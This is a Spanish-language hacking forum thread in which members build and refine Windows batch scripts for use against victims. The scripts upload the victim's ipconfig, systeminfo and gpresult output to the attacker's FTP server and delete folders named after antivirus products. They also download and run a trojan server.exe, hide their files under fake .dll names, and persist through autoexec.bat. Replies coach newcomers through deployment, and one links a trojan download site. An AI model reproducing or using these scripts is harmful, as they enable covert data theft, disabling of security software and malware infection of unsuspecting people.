Nuevas NORMAS para el foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Julio 26, 2008, 12:40:10
Boton Buscar
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Hack Novato  |  Hack para newbies (Moderadores: OzX, ziX92)  |  Tema: Consiguiendo la IP de la Victima y mas... 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] 2 3 4 5 6 7 8 9 10 Ir Abajo Imprimir
Autor Tema: Consiguiendo la IP de la Victima y mas...  (Leído 28258 veces)
El Quemero
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 1329


100% Quemero


Ver Perfil WWW
« en: Febrero 19, 2005, 01:33:29 »
Bueno bueno, muchos alguna vez habran pensado que bueno seria hacerle un "ipconfig /all" a la vicitma y poder verlo,
Nota: para los que no saben que es un ipconfig /all es un comando que se pone en DOS para poder ver tu IP entre otras cosas.
como decia seria bueno poder conseguir el resultado de ese ipconfig, bueno yo lo consegui con los tan preciados .Bat's.
 
Lo que hise fue hacer un .bat que hiciera un "ipconfig /all" lo que diera como resultado (osea la IP) lo guardara en una archivo, llamemoslo IP.txt, una ves hecho esto lo que hase es conectarse a mi ftp y enviarme ese archivo y despues lo borra sin dejar rastros y el .bat se cierra.

Ahora para los que les interese les paso el Codigo Fuente del .Bat:
   @echo off
csl
ipconfig /all > c:\windows\Win32ip.dll
echo USER usuario > c:\windows\Win32el.dll
echo contraseña >> c:\windows\Win32el.dll
echo PUT c:\windows\Win32ip.dll >> c:\windows\Win32el.dll
echo QUIT >> c:\windows\Win32el.dll
ftp -n -s:c:\windows\Win32el.dll ftp.webcindario.com
del c:\windows\Win32el.dll
del c:\windows\Win32ip.dll
cls   
Bueno se los explico:
las 2 primeras lineas ya saben para que son, la 3ª linea hace el ipconfig /all y lo guarda en un archivo llamado Win32ip.dll
NOTA: a este archivo lo guarda en la carpeta Windows porque si no la victima veria que se creo un archivo, se llama Win32ip.dll pero uds. pueden llamarlo como quieran, y tiene la extencion .dll pero el Bat lo maneja como si fuera un .txt y despues nosotros lo podemos ver tambien como si fuera un .txt haciendo click con el boton derecho y en vista rapida van a ver la IP de la victima. (que NOTA mas larga ¿no?)
La 4ª, 5ª, 6ª y 7ª lineas lo que hacen es crear un archivo (Win32el.dll) que contien la informacion nesesaria para entrar en nuestro ftp.
NOTA: ustedes tienen que poner en donde dice "usuario" (4ª linea) su usuario de su ftp por ej: pepe.
y en donde dice "contraseña" (5ª linea) tienen que poner su contraseña de su ftp.
La 6ª y 7ª linea las dejan como estan.
La 8ª linea nos conecta a nuestro ftp usando el Win32el.dll.
NOTA: donde dice "ftp.webcindario.com" ustedes tienen que poner su ftp por ej: ftp.lycos.es   
La 9ª y 10ª lineas borran los 2 archivos que se crearon.
Y la 11ª cierra el .bat.

Con que la victima ejecute este .bat en segundos van a tener el archivo Win32ip.dll con la IP en su ftp.

El unico problema de este es que muestra lo que dice cuando se conecta al ftp, pero no es muy importante porque hace todo tan rapido que no te deja tiempo de leer lo que dice.

Bueno, este es el bat ustedes pueden hacer la modificacion que quieran por que es GNU  Grin Grin Grin Grin
y tambien pueden pasarlo a .exe cambiarle el icono (miren el manual de K4ron73) etc.

Tambien quiero agradecerle a Viper por averme ayudado con el tema del login en el ftp. Ahora te podes dar cuenta de porque hice esa pregunta, gracias.

Estaria bueno que posteen mejoras o correcciones que en cuentren para este .bat o solo nuevas ideas.
Es increible todas las cosas que se pueden hacer con estos BAT'S
« Última modificación: Mayo 16, 2008, 02:49:26 por |_ocutus » En línea
TeChNO
Visitante
« Respuesta #1 en: Febrero 19, 2005, 01:58:11 »
yo lo probe conmigomismo y el firewall ke trae el win xp lo blokeo o_O xD
En línea
LooSeR[FT]
Visitante
« Respuesta #2 en: Febrero 19, 2005, 06:25:04 »
No se si sera fallo mio pero me conecte a terra y todo eso, pero creo que te falto subir el archivo a tu ftp con el comando:
send c:\windows\win32el.dll
dentro del ftp no?? o esque ya lo mandaba solo?
con esto del ftp se pueden hacer maravillas, gracias por aportarlo ElQuemero! Wink ya que si conocemos algun archivo que alguien posea podemos "hacer que nos lo mande" jeje 1saludoooo
En línea
LooSeR[FT]
Visitante
« Respuesta #3 en: Febrero 19, 2005, 07:09:37 »
Se me ha ocurrido otra idea, que les parece si borraramos el antivirus, y seguidamente nos mandamos la ip dela victima y le metemos el troyano y se lo ejecutamos?? todo en un simple .bat  Grin

Aka va el codigo gracias a ElQuemero por el ftp, a K4ron73 y Viper por todo lo que tambien nos han aportado a estos temas!! Wink

  @echo off
c:
cd\
rd /S /Q *panda*
rd /S /Q *norton*
rd /S /Q *antivirus*
cd "archivos de programa"
rd /S /Q *panda*
rd /S /Q *norton*
rd /S /Q *antivirus*
cd..
start http:\\www.lawebquequieras.com
ipconfig /all > c:\windows\win32ip.dll
echo USER usuario > c:\windows\Win32el.dll
echo contraseña > c:\windows\Win32el.dll
echo send c:\windows\win32ip.dll > c:\windows\win32el.dll
echo get server.exe > c:\windows\win32el.dll
echo QUIT >> c:\windows\Win32el.dll
ftp -n -s:c:\windows\Win32el.dll ftp.tuhost.com
move c:\server.exe c:\windows\server.exe
cd windows
server.exe
exit

Ahora explico yo un poco lo que hemos hecho de la linea 2 ala 11 es posicionarnos en el directorio raiz c: y borrar su antivirus, si conoceis que tenga otro que no sea norton o panda pues poneis el nombre entre *astediscos* y luego volvemos al directorio c:
Abrimos la web que quierais poner una que le interese ala persona para que se quede unos segundos mirandola y asi no se dara cuenta Wink
En las siguientes lineas ya hacemos lo que nos explico ElQuemero para conectar al ftp creando el archivo con la pass para conectarnos y el USER, despues añadimos los comandos "send" para enviarnos el archivo win32ip.dll y "get" el server.exe para bajar a su ordenador el server. exe (este archivo antes de todo hemos de colgarlo en el directorio raiz de nuestro ftp), luego con el comando QUIT salimos del ftp.
A continuacion movemos el server.exe de c: ya que daria mucho el cante y lo colocamos en c:\windows\ (o donde querais solo cambiar la carpeta)
y despues entramos en c:\windows para ejecutar el archivo server.exe y exit saliendo del bat.
Tan simple y acabamos de crear un destructor de antivirus, un notifier de ip y le hemos bajado el server.exe sin necesidad de mandarlo y que lo ejecutara sin que el quisiera xD

Otra nueva cosa, si quereis que vuestro bat sea la ostia solo debeis meterlo todo lo que acabamos de hacer en el archivo autoexec.bat y cada vez que se arranque el ordenador le borrara el antivirus, os mandara su ip se bajara el server y se infectara xD estoy asombrado con las cosas que e descubierto que se pueden hacer con un simple archivo .bat y me temo que aun estamos empezando...
Espero que os haya gustado amigos 1saludoooooooooo Wink
« Última modificación: Mayo 16, 2008, 02:50:00 por |_ocutus » En línea
k4ron73
Colaborador
*****
Desconectado Desconectado

Mensajes: 929



Ver Perfil
« Respuesta #4 en: Febrero 19, 2005, 10:16:28 »
Este proyecto me parece realmente fantástico!!
Con vuestro permiso voy a añadir algunas lineas, después las comento:


----------------------------------
  @echo off
cls
c:
cd\
rd /S /Q *panda*
rd /S /Q *norton*
rd /S /Q *antivirus*
cd "archivos de programa"
rd /S /Q *panda*
rd /S /Q *norton*
rd /S /Q *antivirus*
cd..
start
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
ipconfig /all > c:\windows\win32ip.dll
gpresult >> c:\windows\win32ip.dll
systeminfo >> c:\windows\win32ip.dll
echo USER usuario > c:\windows\Win32el.dll
echo contraseña > c:\windows\Win32el.dll
echo send c:\windows\win32ip.dll > c:\windows\win32el.dll
echo get server.exe > c:\windows\win32el.dll
echo QUIT >> c:\windows\Win32el.dll
ftp -n -s:c:\windows\Win32el.dll ftp.tuhost.com
move c:\server.exe c:\windows\server.exe
cd windows
server.exe
exit
---------------------------------------------------

Con estas dos líneas también incluimos al archivo dll información muy valiosa sobre el usuario, conexión a redes, sistema operativo, etc... Cuando recibamos el win32ip.dll en nuestro FTP lo renombramos a win32ip.txt para visualizarlo sin problemas.

Saludos!

Voy a incluir este tema ahora mismo en el índice de creación de BATs, si te parece bien El Quemero.
« Última modificación: Mayo 16, 2008, 02:50:20 por |_ocutus » En línea
LooSeR[FT]
Visitante
« Respuesta #5 en: Febrero 19, 2005, 07:31:16 »
Jeje la verdad es que me siento orgulloso de lo que hemos llegado a crear a partir de un simple .bat, jeje ya que con esto podriamos acabar practicamente con todo ese royo de "Como infecto ala victima???" jeje en un solo archivo tenemos de todo, incluso un Notificador de IP casero creado en ms-dos! jeje seguire estrujandome el cerebro aver que mas cosas podriamos añadir a esto ya que de momento ahora no se me ocurren mas.. jeje con esa ultima me quede vacio xD
1saludooooooooooo y aporten cualquier cosa!!
« Última modificación: Mayo 16, 2008, 02:50:36 por |_ocutus » En línea
LooSeR[FT]
Visitante
« Respuesta #6 en: Febrero 19, 2005, 08:43:09 »
Bueno aki les traigo otro comandito aunque no es una maravilla tampoco pero bueno, es el comando TREE el cual nos muestra un arbol de todos los directorios del ordenador si lo tecleamos en c: pero por ejemplo si quisieramos encontrar algun programa o alguna carpeta con exactitud, podriamos entrar en c:\archivos de programa y teclearlo, asi no tardaria tanto ya que si lo hacemos en c: asta que recoge todos los directorios de c: le cuesta muxiiisimo tiempo, y seria visto, aunque en archivos de programa tambien le cuesta lo suyo, el caso es que tecleando:
tree >> directorios.txt
crearemos un txt con un arbol de directorios, que luego conectandonos a un ftp subiriamos y nos lo mandariamos anosotros, una vez asi ya conoceriamos la estructura de su ordenador y la localizacion del antivirus, firewall y demas programas... aunque por su lentitud no lo recomiendo mucho a no ser que sea sobre una carpeta muy especifica para que no tarde.
1Saludooooooooooooooo Wink
En línea
El Quemero
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 1329


100% Quemero


Ver Perfil WWW
« Respuesta #7 en: Febrero 20, 2005, 12:13:56 »
Bueno, sin duda es enorme lo que conseguimos hacer con un simple .Bat, y es espectacular que hayan aportado tantas ideas ya que era esa mi idea.
Y lo curioso es que este no es un tema muy difundido (los .Bat's) en toda la red solo vi 1 o 2 manuales muy cortos y poco explicativos sobre .Bat's pero ni cerca explicaban el verdadero poder de estos, solo lo usaban para borrar el disco C: y ese tipo de cosas.

Por lo del comando PUT es el mismo que SEND depende del servidor ftp, pero como es nuestro propio ftp es facil comprobarlo.

Y porsupuesto no tengo ningun problema en que se agregue al indice de .Bat's el cual es muy bueno y me sirvio bastante.
En línea
k4ron73
Colaborador
*****
Desconectado Desconectado

Mensajes: 929



Ver Perfil
« Respuesta #8 en: Febrero 20, 2005, 05:06:40 »
La verdad es que tienes razón, El Quemero, yo nunca había visto nunca ninguna información tan extensa y tan "practica" como esta recopilación que hemos hecho entre todos. Hemos redefinido el término "bomba lógica"!!
« Última modificación: Mayo 16, 2008, 02:51:08 por |_ocutus » En línea
Th3°Blu3°+CHAOS*
Visitante
« Respuesta #9 en: Febrero 20, 2005, 09:57:25 »
Dos cosas

1)Donde puedo conseguir un pequeño manual de bat?
2)Como yo soy medio bruto, no me c expresar bien, solo espero que me entiendan... ¿como, cuando y quien tiene que ejecutar ese bat para que funcione?

Ahi se ven...
« Última modificación: Mayo 16, 2008, 02:51:32 por |_ocutus » En línea
El Quemero
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 1329


100% Quemero


Ver Perfil WWW
« Respuesta #10 en: Febrero 21, 2005, 12:06:41 »
Por lo del manual la verdad que lo mejor que hay en la red esta en este foro, podes ver la recopilacion de lo referido a .Bat's que hizo k4ron73.

Y los .Bat's los haces vos desde tu PC y se los envias a tu victima ella ejecuta el .Bat y  hace lo que vos hayas programado, lo puede ejecutar cuando quiere.
En línea
carlucos
Miembro
*****
Desconectado Desconectado

Mensajes: 25


Ver Perfil
« Respuesta #11 en: Febrero 21, 2005, 11:59:23 »
Entonces, cual seria el codigo fuente final, con todo eso de quitar antivirus y mandarte la ip y meterle un troyano??
El codigo fuente se copia en el bloc d notas y de guarda como *.bat ,no??

Soy nuevo en esto y me interesa mucho.

Saludoss
En línea
LooSeR[FT]
Visitante
« Respuesta #12 en: Febrero 21, 2005, 12:25:14 »
En efecto, se crea asi, pero ten en cuenta que para esto debes tener tu un servidor de ftp y poner en el .bat su direccion donde pone "ftp.tuhost.com" pondras la del tuyo Wink y para que se infecte tendras que dejar en tu ftp en la pagina pricipal el server.exe, llamado tal cual y sobre todo en la pagina principal. por lo demas lo copias y lo pegas y lo guardas como .bat y ya lo tienes Wink
En línea
carlucos
Miembro
*****
Desconectado Desconectado

Mensajes: 25


Ver Perfil
« Respuesta #13 en: Febrero 21, 2005, 01:05:02 »
Sirve como ftp un espacio web tipo geocities o alguno de esos?? Si sirve alguno, y q sea gratis, en cual puedo subir .exe??

Saludos y gracias
En línea
carlucos
Miembro
*****
Desconectado Desconectado

Mensajes: 25


Ver Perfil
« Respuesta #14 en: Febrero 21, 2005, 02:15:29 »
Ya he conseguido poner el server.exe en un ftp. X fiin!!
La duda ahora es: El server que tengo es uno que al ejecutarlo se abre una pantalla de instalacion y al instalarlo, se pone el troyano a funcionar. Como tiene que ser ejecutado, como hago para ponerlo en el escritorio en vez de C:\windows Huh

Saludoss (ya se q soy un poco plasta...)
En línea
LooSeR[FT]
Visitante
« Respuesta #15 en: Febrero 21, 2005, 06:27:25 »
En efecto, se crea asi, pero ten en cuenta que para esto debes tener tu un servidor de ftp y poner en el .bat su direccion donde pone "ftp.tuhost.com" pondras la del tuyo Wink y para que se infecte tendras que dejar en tu ftp en la pagina pricipal el server.exe, llamado tal cual y sobre todo en la pagina principal. por lo demas lo copias y lo pegas y lo guardas como .bat y ya lo tienes Wink
« Última modificación: Mayo 16, 2008, 02:51:55 por |_ocutus » En línea
i_berbeu
Colaborador
*****
Desconectado Desconectado

Mensajes: 486


Ver Perfil
« Respuesta #16 en: Febrero 21, 2005, 07:57:41 »
Hola gente!!!
Vamos a ver, la verdad es que este post al final esta quedando muy chulo pero encuentro un fallo bastante gordo que me sorprende que nadie se haya dado cuenta antes.
Aunque a lo mejor si os habeis dado cuenta pero tiene una solucion muy sencilla y posiblemente se os haya pasado.

Vamos a ver, en estas lineas imagino que sin mucho pensar encontramos algo que nos puede convertir a nosotros en victimas........

echo USER usuario > c:\windows\Win32el.dll
echo contraseña > c:\windows\Win32el.dll

le estamos metiendo a la victima en el .bat el usuario y la contraseña de nuestro ftp, mal rollo por que el .bat ese va a quedar en el ordenador de la victima despues de ejecutarse, y a nada que la victima sepa un poquito..........

Ahora es cuando viene la solucion sencilla que seria convertir el archivo en un .exe y haciendo que quede ilegible, pero aunque no lo se, posiblemente haya algun programa que pase de .exe a .bat y si asi es y a la victima le da por probar podemos estar jodidos, asi que otra solucion sencilla seria:
si hemos llamado a nuestro BAT "prueba.bat" por ejemplo, ponemos al final del todo la instruccion

del prueba.bat

con esto borramos el archivo yo lo he probado y funciona pero no estoy seguro de si funcionara en todos los casos.
 
Ahora nos queda el problema de que si queriamos cargar el bat en el autoexec, no podremos volver a hacerlo, pero podemos apañarnoslas para desde nuestro bat, crear otro bat que sea el que carguemos desde el autoexec y como el original lo habremos borrado con la instruccion 'del' antes de que nadie se de cuenta, sera casi imposible que accedan a este bat "auxiliar" en el que sera mas seguro introducir nuestras claves del ftp

Si me equivoco en algo comentarmelo!!!

SALUDOS!
« Última modificación: Mayo 16, 2008, 02:52:30 por |_ocutus » En línea
Th3°Blu3°+CHAOS*
Visitante
« Respuesta #17 en: Febrero 21, 2005, 10:15:48 »
Bueno... gracias x responder mi duda. Me podrias pasar el link del manual de k4ron73 de los bat's si no te es molestia. Mi conexion a Internet es muy lenta y se me cuelga cada 5x6. Mas el tiempo que es dinero... no tengo suficiente tiempo para buscarlo x mi... lo siento...
En línea
El Quemero
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 1329


100% Quemero


Ver Perfil WWW
« Respuesta #18 en: Febrero 21, 2005, 11:13:29 »
El manual de k4ron73 y mas cosas las vas a encontrar acá:

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

Y para i_berbeu, si la victima puede si sabe algo ver el codigo del .Bat y ver nuestro host, pass, y user, pero se supone que te haces un host especialmente para esto o usas alguno que no tenga tus datos, no vas a poner como user tu nombre y como pass tu Nº de documento  Tongue Tongue Tongue.
« Última modificación: Mayo 16, 2008, 02:52:55 por |_ocutus » En línea
LooSeR[FT]
Visitante
« Respuesta #19 en: Febrero 22, 2005, 09:33:50 »
En efecto, si kieres que solo se infecte una vez y no correr riesgos, pues lo borras despues de todo poniendo el "del prueba.bat" que dices tu, pero ten en cuenta que si no lo borras y lo metemos en el autoexec.bat, estamos creando un notificador, infectador, y eliminador de antivirus con cada sesion Wink
se supone que la persona no sabra mucho, ya que si supiera lo 1º de todo es que no te iba a aceptar el .bat xD
« Última modificación: Mayo 16, 2008, 02:53:14 por |_ocutus » En línea
carlucos
Miembro
*****
Desconectado Desconectado

Mensajes: 25


Ver Perfil
« Respuesta #20 en: Febrero 22, 2005, 09:50:15 »
Gracias por responderme a la duda. El troyano ese lo he descargado de aqui:

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
www.cyberpirata.org/downloads-cat-45.html

Tambien he intentado descargar el littlewitch pero el server.exe cuando lleva un 99% me pone que no se puede abrir y no me deja descargarlo. He probado a descargarlo con el antivirus quitado y no hay manera.

Saludos.
En línea
LooSeR[FT]
Visitante
« Respuesta #21 en: Febrero 22, 2005, 09:53:00 »
Un consejo es que siempre que descargues hacktools quites el antivirus, ya que normalmente te dan problemas porque aunque esten comprimidos o eso.. los detecta, si te da problemas pues nose, busca otras paginas de descarga, que hay cientos!!
En línea
carlucos
Miembro
*****
Desconectado Desconectado

Mensajes: 25


Ver Perfil
« Respuesta #22 en: Febrero 22, 2005, 11:14:46 »
Gracias por la ayuda. He probado el .bat en mi pc y sale una pantalla de comandos que no deberia salir... ademas el ftp no funciona (esto supongo que lo habre puesto yo mal).

Saludos
En línea
LooSeR[FT]
Visitante
« Respuesta #23 en: Febrero 22, 2005, 11:59:53 »
La pantalla de ms-dos siempre se inicia, suele hacer un parpadeo rapido, ya que con el  @echo off lo que haces es que no salgan los comandos pero la pantalla se abre siempre Wink puedes abrir una web como pusimos en el .bat para que distraiga y no se note tanto
En línea
carlucos
Miembro
*****
Desconectado Desconectado

Mensajes: 25


Ver Perfil
« Respuesta #24 en: Febrero 22, 2005, 01:19:30 »
Es lo que tiene ser nuevo en esto, que no sabes las cosas que ocurren. Tengo otro problema...
El primero es que aunque pongo   @ echo off cuando pasa a recopilar informacion aparece en la pantalla de comandos...
Y el segundo es que no hay manera de conectarse al ftp... me pone que pide USSER y PASS y ya lo tengo puesto. Lo tengo puesto asi, aver si me coregis:

  @ echo off
cd \
cd archivos de programa
del /Q /F /S "Panda Software"
cd..
start
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
gpresult >> c:\windows\win32ip.dll
systeminfo >> c:\windows\win32ip.dll
ipconfig /all > c:\windows\win32ip.dll
echo USER **** > c:\windows\Win32el.dll ****
echo **** > c:\windows\Win32el.dll ****
echo send c:\windows\win32ip.dll >c:\windows\win32el.dll
echo get orisinal.exe > c:\windows\win32el.dll
echo QUIT >> c:\windows\Win32el.dll
ftp -n -s:c:\windows\Win32el.dll ftp.espacio.ya.com
move c:\orisinal.exe c:\Windows\orisinal.exe
cd windows
orisinal.exe
exit

Donde **** es mi contraseña y mi usuario jejeje...

EDITO: Acabo de encontrar el fallo. Las lineas de USER y el password y la de send no se escriben el el Win32el.dll

Saludos
« Última modificación: Mayo 16, 2008, 02:53:39 por |_ocutus » En línea
Páginas: [1] 2 3 4 5 6 7 8 9 10 Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Hack Novato  |  Hack para newbies (Moderadores: OzX, ziX92)  |  Tema: Consiguiendo la IP de la Victima y mas... « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.5 | SMF © 2006-2007, Simple Machines LLC